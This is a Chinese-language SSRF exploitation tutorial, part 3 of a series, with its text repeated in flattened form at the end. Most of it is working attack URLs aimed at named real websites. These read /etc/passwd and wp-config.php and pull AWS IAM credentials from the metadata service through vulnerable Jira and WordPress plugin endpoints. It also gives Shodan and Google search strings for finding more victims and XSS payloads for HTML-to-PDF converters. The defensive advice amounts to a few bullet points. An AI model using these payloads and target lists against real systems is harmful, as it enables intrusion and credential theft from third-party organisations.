SSRF-服务器端请求伪造(类型和利用方法)第3部分
字数 1052 2025-08-26 22:11:15

服务器端请求伪造(SSRF)类型与利用方法详解

1. SSRF基础概念

服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种安全漏洞,攻击者能够诱使服务器向攻击者选择的内部或外部系统发起请求。

2. SSRF实例分析

2.1 基本SSRF示例

https://robert-brook.com/parliament/index.php?page=http://www.parliament.uk/business/news/2019/...

此例中,page参数获取外部资源并显示其内容,存在SSRF漏洞。

2.2 SSRF到XSS转换

https://robert-brook.com/parliament/index.php?page=http://brutelogic.com.br/poc.svg

通过加载外部SVG文件实现XSS攻击。

2.3 本地文件读取

https://robert-brook.com/parliament/index.php?page=file:///etc/passwd

利用file://协议读取服务器本地文件。

3. 特定协议利用

当尝试使用dict协议时,服务器返回错误:

警告:file_get_contents():无法找到包装器"dict" - 你是否忘记在配置PHP时启用它。

这表明服务器未启用DICT URL结构。

4. FFMPEG中的SSRF漏洞

4.1 漏洞描述

FFMPEG在处理某些输入文件时存在SSRF漏洞,可导致本地文件读取。

4.2 易受攻击站点示例

  • https://www.onlinevideoconverter.com/
  • https://www.files-conversion.com/

4.3 相关资源

  • 演示视频: https://youtu.be/OQBZ__L23KU
  • 漏洞利用代码库: https://github.com/neex/ffmpeg-avi-m3u-xbin

5. Jira中的SSRF漏洞

5.1 受影响版本

Jira版本低于7.3.5存在SSRF漏洞。

5.2 漏洞端点

https://<JIRA_BASEPATH>/plugins/servlet/oauth/users/icon-uri?consumerUri=...

5.3 搜索方法

Shodan搜索语法:

X-AUSERNAME: anonymous
X-AUSERNAME: anonymous org:"Amazon.com" -- AWS环境
X-AUSERNAME: anonymous org:"Microsoft Azure" -- Azure环境
X-AUSERNAME: anonymous org:"google" -- Google环境

5.4 易受攻击站点示例

https://jira.majesco.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://jira.intellectdesign.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
https://team.asg.com/plugins/servlet/oauth/users/icon-uri?consumerUri=https://google.com
...

5.5 AWS元数据泄露示例

https://jira.vectormediagroup.com/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/
http://52.202.112.34/plugins/servlet/oauth/users/icon-uri?consumerUri=http://169.254.169.254/latest/meta-data/iam/security-credentials/SystemsManagerRole

6. WordPress插件中的SSRF漏洞

6.1 JSmol2WP插件

  • 受影响版本:低于1.07
  • 漏洞端点: 
    http://localhost:8080/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=wp-config.php
  • 搜索语法:inurl:wp-content/plugins/jsmol2wp
  • 易受攻击站点: 
    https://www.vivelab12.fr/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=php://filter/resource=wp-config.php
http://thasso.com/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=getRawDataFromDatabase&query=https://google.com

6.2 Qards插件

  • 漏洞端点: 
    http://target/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
  • 搜索语法:inurl:wp-content/plugins/qards
  • 易受攻击站点: 
    http://www.horlovia-chemicals.ch/wordpress/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com
https://vfsgroup.com.au/wp-content/plugins/qards/html2canvasproxy.php?url=http://google.com

7. HTML转PDF服务中的SSRF

易受攻击的在线转换服务:

  • https://pdfcrowd.com/#convert_by_input
  • https://convertio.co/html-pdf/

利用payload示例:

"><iframe src="file:///etc/passwd"></iframe>
"><svg/onload=document.write(document.location)>

8. 防御建议

  1. 输入验证和过滤
  2. 限制允许的URL协议
  3. 实施网络层防护
  4. 及时更新系统和插件
  5. 最小化服务器网络权限

9. 免责声明

本文档中提供的所有网站示例仅用于学习和测试目的,不得用于非法活动。作者不对任何滥用行为负责。

服务器端请求伪造(SSRF)类型与利用方法详解 1. SSRF基础概念 服务器端请求伪造(Server-Side Request Forgery, SSRF)是一种安全漏洞,攻击者能够诱使服务器向攻击者选择的内部或外部系统发起请求。 2. SSRF实例分析 2.1 基本SSRF示例 此例中, page 参数获取外部资源并显示其内容,存在SSRF漏洞。 2.2 SSRF到XSS转换 通过加载外部SVG文件实现XSS攻击。 2.3 本地文件读取 利用 file:// 协议读取服务器本地文件。 3. 特定协议利用 当尝试使用 dict 协议时,服务器返回错误: 这表明服务器未启用DICT URL结构。 4. FFMPEG中的SSRF漏洞 4.1 漏洞描述 FFMPEG在处理某些输入文件时存在SSRF漏洞,可导致本地文件读取。 4.2 易受攻击站点示例 https://www.onlinevideoconverter.com/ https://www.files-conversion.com/ 4.3 相关资源 演示视频: https://youtu.be/OQBZ__ L23KU 漏洞利用代码库: https://github.com/neex/ffmpeg-avi-m3u-xbin 5. Jira中的SSRF漏洞 5.1 受影响版本 Jira版本低于7.3.5存在SSRF漏洞。 5.2 漏洞端点 5.3 搜索方法 Shodan搜索语法: 5.4 易受攻击站点示例 5.5 AWS元数据泄露示例 6. WordPress插件中的SSRF漏洞 6.1 JSmol2WP插件 受影响版本:低于1.07 漏洞端点: 搜索语法: inurl:wp-content/plugins/jsmol2wp 易受攻击站点: 6.2 Qards插件 漏洞端点: 搜索语法: inurl:wp-content/plugins/qards 易受攻击站点: 7. HTML转PDF服务中的SSRF 易受攻击的在线转换服务: https://pdfcrowd.com/#convert_ by_ input https://convertio.co/html-pdf/ 利用payload示例: 8. 防御建议 输入验证和过滤 限制允许的URL协议 实施网络层防护 及时更新系统和插件 最小化服务器网络权限 9. 免责声明 本文档中提供的所有网站示例仅用于学习和测试目的,不得用于非法活动。作者不对任何滥用行为负责。